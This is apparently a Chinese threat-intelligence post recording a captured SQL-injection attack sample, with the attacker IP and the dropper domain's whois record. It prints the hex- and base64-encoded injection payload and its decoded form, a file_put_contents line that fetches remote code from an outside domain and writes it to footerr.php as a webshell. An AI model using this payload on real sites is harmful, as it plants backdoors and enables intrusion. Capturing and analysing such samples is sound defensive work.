扫描 sql注入 木马
sql注入一句话木马攻击捕获
匿名用户 2019-12-09 10:14:36 865人浏览

攻击来源IP:116.239.252.161

样本 1:

a:2:{s:3:"num";s:344:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A766233526C636E4975634768774A79786D6157786C5832646C6446396A623235305A5735306379676E6148523063446F764C327476636D56784C6D4E754C325268626D5268626935306548516E4B513D3D2729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}

样本1解密后:

file_put_contents('footerr.php',file_get_contents('http://koreq.cn/dandan.txt')

Whois 查询结果:

Domain Name: koreq.cn

ROID: 20170310s10001s88914692-cn

Domain Status: ok

Registrant ID: hc9294322159536

Registrant: 山西仁义信商贸有限公司

Registrant Contact Email: 826461060@qq.com

Sponsoring Registrar: 阿里云计算有限公司(万网)

Name Server: f1g1ns1.dnspod.net

Name Server: f1g1ns2.dnspod.net

Registration Time: 2017-03-10 22:56:04

Expiration Time: 2020-03-10 22:56:04

DNSSEC: unsigned

ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
匿名用户 2019-12-11 08:30:16 回复
这个是什么加密呢